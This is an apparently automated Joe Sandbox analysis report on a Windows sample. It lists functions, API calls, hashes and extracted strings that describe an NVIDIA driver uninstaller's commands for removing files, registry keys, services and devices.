                                  Function 00416A8C Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                  Download Yara Rule
                                  APIs
                                  • SetUnhandledExceptionFilter.KERNEL32(Function_00016A4F), ref: 00416A91
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: ExceptionFilterUnhandled
                                  • String ID:
                                  • API String ID: 3192549508-0
                                  • Opcode ID: 03d51526594cf31ddfcdaad92c3bc03b361f09153d1a434295373f872738f46a
                                  • Instruction ID: 1a39cd3ecfb8144f4f1783dd73fdd0f7c678ae64291d6b6cf59011757d761d4c
                                  • Opcode Fuzzy Hash: 03d51526594cf31ddfcdaad92c3bc03b361f09153d1a434295373f872738f46a
                                  • Instruction Fuzzy Hash: DC9022B02000802A020003308C2E08020808E8C282303A0202800C0000CB2080800008
                                  Function 0047B7BF Relevance: .4, Instructions: 409COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f4c4ac0512ad029f24f0d8f95b3687ce4f89bf976eca3f9a8a5502af46803cde
                                  • Instruction ID: 6ef4158a4c278fbbeb488f0612d98be58833bb882bcaff3ed1cb5ef879c16298
                                  • Opcode Fuzzy Hash: f4c4ac0512ad029f24f0d8f95b3687ce4f89bf976eca3f9a8a5502af46803cde
                                  • Instruction Fuzzy Hash: 76C19837B853280BD70C48EDDCE13A5AA4BD7D5321F1B833E9A568B7C5DEAC490602C4
                                  Function 0047B874 Relevance: .4, Instructions: 353COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ff9770ac83485ea373c1331299549a21d82c2f29004a4750015414cdbe9335bf
                                  • Instruction ID: a511684ab90478b3ec4b6b31deb4d6a62a5a4267bb2a1763fb07238f9614424d
                                  • Opcode Fuzzy Hash: ff9770ac83485ea373c1331299549a21d82c2f29004a4750015414cdbe9335bf
                                  • Instruction Fuzzy Hash: 2BA18837B853280BE70848ED9DE13A5AA8BD7D5720F1A833E9A558B7C9CEBD450601C4
                                  Function 0047B8B0 Relevance: .3, Instructions: 335COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: eb9f2f5726a5360b4111c8c79dc817ddb16868841e4e35c65c081fa033cea37f
                                  • Instruction ID: 9881b5ea8813afef01d938b652f4e8e4e1628a8aeded3cb36fdf36d4e5d7b6db
                                  • Opcode Fuzzy Hash: eb9f2f5726a5360b4111c8c79dc817ddb16868841e4e35c65c081fa033cea37f
                                  • Instruction Fuzzy Hash: F4A19737B853280BE7094CED9CE13A5AA87D7D9720F5A833E8A558B7C5CEBD490642C4
                                  Function 022F5682 Relevance: .2, Instructions: 191COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: true
                                  • Associated: 00000000.00000002.1519756597.000000000231D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22f0000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e37dc2b2704ba8a31452895283176b6159364b9a0ae5c63ec3f4e96527e58849
                                  • Instruction ID: 06d2b64f4ee7a272c15912ce310d05e70aa8f2263e2638535416a26493e40656
                                  • Opcode Fuzzy Hash: e37dc2b2704ba8a31452895283176b6159364b9a0ae5c63ec3f4e96527e58849
                                  • Instruction Fuzzy Hash: C6815E74A146498FDB15CFA8C890BAEFBF2EF4E314F5482A8D465AF794C3356851CB40
                                  Function 02306440 Relevance: .2, Instructions: 186COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: true
                                  • Associated: 00000000.00000002.1519756597.000000000231D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22f0000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cba396393552e373ef23297fca1e4430dd6d130cf8771c7690be50d40411dcfd
                                  • Instruction ID: 73c49a68e319b7694202c91f2e2a43c1633c7febf1b068626e12caca73397b87
                                  • Opcode Fuzzy Hash: cba396393552e373ef23297fca1e4430dd6d130cf8771c7690be50d40411dcfd
                                  • Instruction Fuzzy Hash: BD715E70E0414A8BDB08CF99C5A17BFBBB6EF89304F18C069D955EB389D6349912CF94
                                  Function 0040A9A0 Relevance: 205.1, APIs: 1, Strings: 116, Instructions: 315COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00403260: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process), ref: 0040329C
                                    • Part of subcall function 00403260: GetProcAddress.KERNEL32(00000000), ref: 004032A3
                                    • Part of subcall function 00403260: GetCurrentProcess.KERNEL32(?), ref: 004032BA
                                    • Part of subcall function 00403260: _sprintf.LIBCMT ref: 004032DF
                                    • Part of subcall function 00403260: MessageBoxA.USER32(?,?,Fatal Error,00000010), ref: 004032F7
                                  • LoadStringA.USER32(?,00000001,0042ACB8,00000080), ref: 0040AEB2
                                  Strings
                                  • Runs the given file and deletes it. It also removes the given key from Add/Remove Program list, xrefs: 0040AA2A
                                  • CheckPath, xrefs: 0040AA1E
                                  • DelBootQuiet, xrefs: 0040AAC0
                                  • Given an appname enumerates all the running app and kills its process if it is running, xrefs: 0040AD1E
                                  • GetReg, xrefs: 0040AB7D
                                  • uninstalls the given service name, xrefs: 0040AB89, 0040ABA4
                                  • DelReg, xrefs: 0040AB2C
                                  • Void, xrefs: 0040ACD2
                                  • Installs the given driver for any device matched using UpdateDriverForPlugAndPlayDevices for Win200 and above and InstallDriverEx for Win95 and Win98, xrefs: 0040ABF5
                                  • CreateShortcut, xrefs: 0040AD63
                                  • Removes the specified string from the original string of words if found and saves the result in new variable, xrefs: 0040AACC
                                  • Adds the given name to environment variables and sets its value, xrefs: 0040ACE8
                                  • Enumerates all keys matching the given regpath and when matched enumarates all names under that key then calls the given command {Current Reg name} and {Current Reg value} are set when the given command is executed, xrefs: 0040AC97
                                  • UninstallService, xrefs: 0040ABB3
                                  • DelBoot, xrefs: 0040AA8A
                                  • Copies a file from the given source to given dest, xrefs: 0040AAE7
                                  • FindOEMInf, xrefs: 0040A9EE
                                  • AddUninstall, xrefs: 0040AA6F
                                  • VWh4A, xrefs: 0040AD43
                                  • Enumerates all keys matching the given regpath and when matched calls the given command {Current Reg Key} is set then the given command is executed, xrefs: 0040ACB2
                                  • Hardware ID}, {InfFullPath, xrefs: 0040ABDF, 0040ABFA, 0040AC15
                                  • VWhA, xrefs: 0040AA19
                                  • DelRegE, xrefs: 0040AB47
                                  • \NVUninst.nvu, xrefs: 0040AE6D
                                  • CreateDevice, xrefs: 0040AC1F
                                  • Service Name}, {StopCode, xrefs: 0040AB8E
                                  • RemoveDevice, xrefs: 0040ABCE
                                  • Srcfile,DstFile, xrefs: 0040AAEC, 0040AB07
                                  • DisplayControlPanel, xrefs: 0040ADEA
                                  • Enum Type} , {Hardware ID}, {Device type, xrefs: 0040ABC4
                                  • InstallDriverEx, xrefs: 0040ABE9
                                  • RmString, xrefs: 0040AADB
                                  • Displays message about Display Control Panel uninstall., xrefs: 0040ADDB
                                  • Returns TRUE if path exists., xrefs: 0040AA0F
                                  • GUID,{StrPattern1};{StrPattern2};...., xrefs: 0040AC81
                                  • Remove any device matched with the given description from the system using setupdi calls.Enum can be (PCI, EISA, etc), HWID usually is VEN_10DE and device type can be DISPLAY,HDC,MEDIA,NET,SYSTEM, xrefs: 0040ABBF
                                  • RegPathToEnumatrate} , {Command, xrefs: 0040AC9C, 0040ACB7
                                  • SendMessage, xrefs: 0040AD48
                                  • Install ITB Driver, xrefs: 0040AE2B
                                  • Registry pattern matching string\Name[=value], xrefs: 0040AB58
                                  • Path to files to be deleted on reboot without reboot request, xrefs: 0040AAB6
                                  • Pass in the GUID of the inf and the string patterns of the reg names to be deleted. It will remove all the reg names corresponding to the str pattern under the GUID subkeys (i.e. 0000,0001..... except in Properties), xrefs: 0040AC7C
                                  • EnumRegCmd, xrefs: 0040ACC1
                                  • Variable Name = Full Path to Inf, xrefs: 0040AC30
                                  • Variable} = Local Path, xrefs: 0040AA14
                                  • Variable} = SrcStr(-)"RmStr", xrefs: 0040AAD1
                                  • Uninstalls the given product from add remove programs.If it detects uninstall as its nvu it uses internal uninstall command otherwise calls the appropriate uninstall command., xrefs: 0040AA45
                                  • u:@, xrefs: 0040A9B9, 0040AECE
                                  • Uninstall, xrefs: 0040AA39
                                  • Variable} = {regkeypath\Name, xrefs: 0040AB73
                                  • QVh,A, xrefs: 0040ABAE
                                  • ClassSweep, xrefs: 0040AC8B
                                  • NVU File}, {Uninstall Reg key, xrefs: 0040AA2F
                                  • DeviceId},{Class},{Cmd, xrefs: 0040AD8F
                                  • DelIniIfMatched, xrefs: 0040AC70
                                  • Uninstall Display Reg key, xrefs: 0040AA4A
                                  • LnkFile,Title,ProgFile,ProgArgs,ProgWorkingDir, xrefs: 0040AD59
                                  • KillApp, xrefs: 0040AD2D
                                  • Inffile} , {Section} , {Name} , {Value} , {[,...], xrefs: 0040AC66
                                  • It uses the first char of the path as drive letter and assigns the port number of that to the given variable name., xrefs: 0040AD6F
                                  • Master Data File, xrefs: 0040AE93
                                  • Service Name, xrefs: 0040ABA9
                                  • Displays the GUI to uninstall whatever user chooses, xrefs: 0040AD03
                                  • Returns TRUE if RAID exists., xrefs: 0040ADC0
                                  • Adds Display name as the title to in Add/Remove programs list and copies uninstall binary and script file to windows system directory, xrefs: 0040AA60
                                  • it searches in all inf files under sysdir\inf\OEM*.inf and if it finds a match with given parameters it deletes it on reboot, xrefs: 0040AC61
                                  • Set NVUninst_RegKey={UninstRegkey}\NVIDIA Drivers, xrefs: 0040AE02
                                  • GetInfGUID, xrefs: 0040AC3A
                                  • If it finds name under regkeypath copies its value to the given variable, othewise does nothing., xrefs: 0040AB6E
                                  • Name=Value, xrefs: 0040ACED
                                  • WildCard} , {Section} , {Name} , {Value} , {[...], xrefs: 0040AC4B
                                  • InstallDriver, xrefs: 0040AC04
                                  • Registry pattern matching string, xrefs: 0040AB22, 0040AB3D
                                  • StopService, xrefs: 0040AB98
                                  • GetFolderPath, xrefs: 0040ADB4
                                  • CheckRAID, xrefs: 0040ADCF
                                  • SetEnv, xrefs: 0040ACF7
                                  • DelOemInfs, xrefs: 0040AC55
                                  • It enumerats all the devices present on the system if any device has {DeviceID} and is from the given {Class} then variable {Current Device} is set to that device ID and the given command gets executed., xrefs: 0040AD8A
                                  • Deletes regkey(s) matching the given registry key, xrefs: 0040AB1D
                                  • Variable} = {path, xrefs: 0040AD74
                                  • Put the given file for delete in the next reboot.If the file exists it will ask user for the reboot when program ends., xrefs: 0040AA7B, 0040AAB1
                                  • Deletes the given file if it exists, It also deletes a directory if it is empty. If the file is locked it will set the system to delete the file upon reboot, xrefs: 0040AA96
                                  • it searches in all inf files under sysdir\inf\[Wildcard and OEM*.inf] and if it finds a match with given parameters it deletes it on reboot, xrefs: 0040AC46
                                  • Uninstall File} , {Display Name, xrefs: 0040AA65
                                  • UnInstallEx, xrefs: 0040AA54
                                  • Variable} , INF name, xrefs: 0040A9E4
                                  • GetDrivePort, xrefs: 0040AD7E
                                  • UninstallGUI, xrefs: 0040AD12
                                  • Sets the given variable to a string representing the inf's GUID, xrefs: 0040AC2B
                                  • SetReg, xrefs: 0040AB62
                                  • Copy, xrefs: 0040AAF6
                                  • Del, xrefs: 0040AAA5
                                  • Variable Name = FolderCode, xrefs: 0040ADAA
                                  • For all the matching registry paths, sets values if [=value] is present, creates subkeys otherwise, xrefs: 0040AB53
                                  • Set UninstRegKey=HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 0040ADF6
                                  • Installs the given driver for any device matched with the given device ID from the system using setupdi calls., xrefs: 0040ABDA
                                  • AppName}, {Message, xrefs: 0040AD3E
                                  • AppName, xrefs: 0040AD23
                                  • Set UNINSTALL_TAG=UNINSTALL IN PROGRESS, xrefs: 0040AE1A
                                  • Path to files to be deleted on reboot, xrefs: 0040AA80
                                  • Copies a file from the given source to given dest only if source is a higher version., xrefs: 0040AB02
                                  • Only deletes regkey(s) matching the given registry key if they have no subkeys or values, xrefs: 0040AB38
                                  • Creates a shell link (shortcut), xrefs: 0040AD54
                                  • EnumDevices, xrefs: 0040AD99
                                  • Given an appname, sends its window a message, xrefs: 0040AD39
                                  • sysdir, xrefs: 0040AE37
                                  • This function first creates a device Installs the driver for this device using given inf. This function should work for all versions of Windows, xrefs: 0040AC10
                                  • Sets the given variable to the path of a special folder, identified by its CSIDL (check MSDN SHGetSpecialFolderPath Function), xrefs: 0040ADA5
                                  • Path to file to be deleted, xrefs: 0040AA9B
                                  • CopyV, xrefs: 0040AB11
                                  • This is a legacy command to maintain backward compatibility., xrefs: 0040ACCD
                                  • EnumRegNamesCmd, xrefs: 0040ACA6
                                  • Looks under the windows INF directory for additional NVIDIA display driver infs (oem*.inf). Returns TRUE if found., xrefs: 0040A9DF
                                  • UnifyUninst, xrefs: 0040ACDC
                                  • Set NVCompList_RegKey={NVUninst_RegKey}\SubComponents, xrefs: 0040AE0E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: AddressCurrentHandleLoadMessageModuleProcProcessString_sprintf
                                  • String ID: it searches in all inf files under sysdir\inf\[Wildcard and OEM*.inf] and if it finds a match with given parameters it deletes it on reboot$AddUninstall$Adds Display name as the title to in Add/Remove programs list and copies uninstall binary and script file to windows system directory$Adds the given name to environment variables and sets its value$AppName$AppName}, {Message$CheckPath$CheckRAID$ClassSweep$Copies a file from the given source to given dest$Copies a file from the given source to given dest only if source is a higher version.$Copy$CopyV$CreateDevice$CreateShortcut$Creates a shell link (shortcut)$Del$DelBoot$DelBootQuiet$DelIniIfMatched$DelOemInfs$DelReg$DelRegE$Deletes regkey(s) matching the given registry key$Deletes the given file if it exists, It also deletes a directory if it is empty. If the file is locked it will set the system to delete the file upon reboot$DeviceId},{Class},{Cmd$DisplayControlPanel$Displays message about Display Control Panel uninstall.$Displays the GUI to uninstall whatever user chooses$Enum Type} , {Hardware ID}, {Device type$EnumDevices$EnumRegCmd$EnumRegNamesCmd$Enumerates all keys matching the given regpath and when matched calls the given command {Current Reg Key} is set then the given command is executed$Enumerates all keys matching the given regpath and when matched enumarates all names under that key then calls the given command {Current Reg name} and {Current Reg value} are set when the given command is executed$FindOEMInf$For all the matching registry paths, sets values if [=value] is present, creates subkeys otherwise$GUID,{StrPattern1};{StrPattern2};....$GetDrivePort$GetFolderPath$GetInfGUID$GetReg$Given an appname enumerates all the running app and kills its process if it is running$Given an appname, sends its window a message$Hardware ID}, {InfFullPath$If it finds name under regkeypath copies its value to the given variable, othewise does nothing.$Inffile} , {Section} , {Name} , {Value} , {[,...]$Install ITB Driver$InstallDriver$InstallDriverEx$Installs the given driver for any device matched using UpdateDriverForPlugAndPlayDevices for Win200 and above and InstallDriverEx for Win95 and Win98$Installs the given driver for any device matched with the given device ID from the system using setupdi calls.$It enumerats all the devices present on the system if any device has {DeviceID} and is from the given {Class} then variable {Current Device} is set to that device ID and the given command gets executed.$It uses the first char of the path as drive letter and assigns the port number of that to the given variable name.$KillApp$LnkFile,Title,ProgFile,ProgArgs,ProgWorkingDir$Looks under the windows INF directory for additional NVIDIA display driver infs (oem*.inf). Returns TRUE if found.$Master Data File$NVU File}, {Uninstall Reg key$Name=Value$Only deletes regkey(s) matching the given registry key if they have no subkeys or values$Pass in the GUID of the inf and the string patterns of the reg names to be deleted. It will remove all the reg names corresponding to the str pattern under the GUID subkeys (i.e. 0000,0001..... except in Properties)$Path to file to be deleted$Path to files to be deleted on reboot$Path to files to be deleted on reboot without reboot request$Put the given file for delete in the next reboot.If the file exists it will ask user for the reboot when program ends.$QVh,A$RegPathToEnumatrate} , {Command$Registry pattern matching string$Registry pattern matching string\Name[=value]$Remove any device matched with the given description from the system using setupdi calls.Enum can be (PCI, EISA, etc), HWID usually is VEN_10DE and device type can be DISPLAY,HDC,MEDIA,NET,SYSTEM$RemoveDevice$Removes the specified string from the original string of words if found and saves the result in new variable$Returns TRUE if RAID exists.$Returns TRUE if path exists.$RmString$Runs the given file and deletes it. It also removes the given key from Add/Remove Program list$SendMessage$Service Name$Service Name}, {StopCode$Set NVCompList_RegKey={NVUninst_RegKey}\SubComponents$Set NVUninst_RegKey={UninstRegkey}\NVIDIA Drivers$Set UNINSTALL_TAG=UNINSTALL IN PROGRESS$Set UninstRegKey=HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall$SetEnv$SetReg$Sets the given variable to a string representing the inf's GUID$Sets the given variable to the path of a special folder, identified by its CSIDL (check MSDN SHGetSpecialFolderPath Function)$Srcfile,DstFile$StopService$This function first creates a device Installs the driver for this device using given inf. This function should work for all versions of Windows$This is a legacy command to maintain backward compatibility.$UnInstallEx$UnifyUninst$Uninstall$Uninstall Display Reg key$Uninstall File} , {Display Name$UninstallGUI$UninstallService$Uninstalls the given product from add remove programs.If it detects uninstall as its nvu it uses internal uninstall command otherwise calls the appropriate uninstall command.$VWh4A$VWhA$Variable Name = FolderCode$Variable Name = Full Path to Inf$Variable} , INF name$Variable} = Local Path$Variable} = SrcStr(-)"RmStr"$Variable} = {path$Variable} = {regkeypath\Name$Void$WildCard} , {Section} , {Name} , {Value} , {[...]$\NVUninst.nvu$it searches in all inf files under sysdir\inf\OEM*.inf and if it finds a match with given parameters it deletes it on reboot$sysdir$u:@$uninstalls the given service name
                                  • API String ID: 630776493-1237869552
                                  • Opcode ID: 1b701e2122844532ca81c72ddfc458444547500ee1f1d10c6943052781ea90d4
                                  • Instruction ID: 0c1ef3616e7e26c261f89652d05a4f70b547082805477117418d2602b03b46ac
                                  • Opcode Fuzzy Hash: 1b701e2122844532ca81c72ddfc458444547500ee1f1d10c6943052781ea90d4
                                  • Instruction Fuzzy Hash: 6FA137343D5BA0B6C515A7216C13F6E65C15B94F48BB0443FB08637AE7CAFC39868A8D
                                  Function 00404AB0 Relevance: 59.8, APIs: 16, Strings: 18, Instructions: 344registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • _memset.LIBCMT ref: 00404AFC
                                  • _memset.LIBCMT ref: 00404B11
                                  • _memset.LIBCMT ref: 00404B2C
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • _sprintf.LIBCMT ref: 00404B70
                                  • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404B9F
                                  • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,?,00000000,00000000,?,?,?,00000000,00000000), ref: 00404BD7
                                  • _memset.LIBCMT ref: 00404C74
                                  • _memset.LIBCMT ref: 00404C81
                                  Strings
                                  • AddRegName, xrefs: 00404D32
                                  • UninstCommandClass::QueryClassKeyNamesForDelete(%s,%s), xrefs: 00404B33
                                  • SYSTEM\CurrentControlSet\Control\Class\%s, xrefs: 00404B66
                                  • Elements inside g_ClassRegNamelist: %s, xrefs: 00404DFA
                                  • Enumerating Reg Path:%s, xrefs: 00404B7D
                                  • Number of subkeys: %d, xrefs: 00404E51
                                  • Number of elements inside g_ClassRegNamelist:%d, xrefs: 00404DEB
                                  • Placing back the original Class Path, xrefs: 00404F16
                                  • if %s, xrefs: 00404CD4
                                  • Could not allocate memory for szName and pValue, xrefs: 00404E32
                                  • %s\%s, xrefs: 00404EE1
                                  • set AddRegName = 0, xrefs: 00404CC0
                                  • %s%s then set AddRegName = 1, xrefs: 00404D15
                                  • Number of reg names: %d, xrefs: 00404C0B
                                  • Properties, xrefs: 00404EF3
                                  • g_ClassRegNamelist has reached its max level to store the names(count = %d). Will delete the current elements and query the names again!, xrefs: 00404DCD
                                  • Current subkey: %s, xrefs: 00404EA6
                                  • %s;%s, xrefs: 00404D85
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: _memset$Time_fputs$DebugFormatInfoLocalMutexObjectOpenOutputQueryReleaseSingleStringWait_fprintf_sprintf
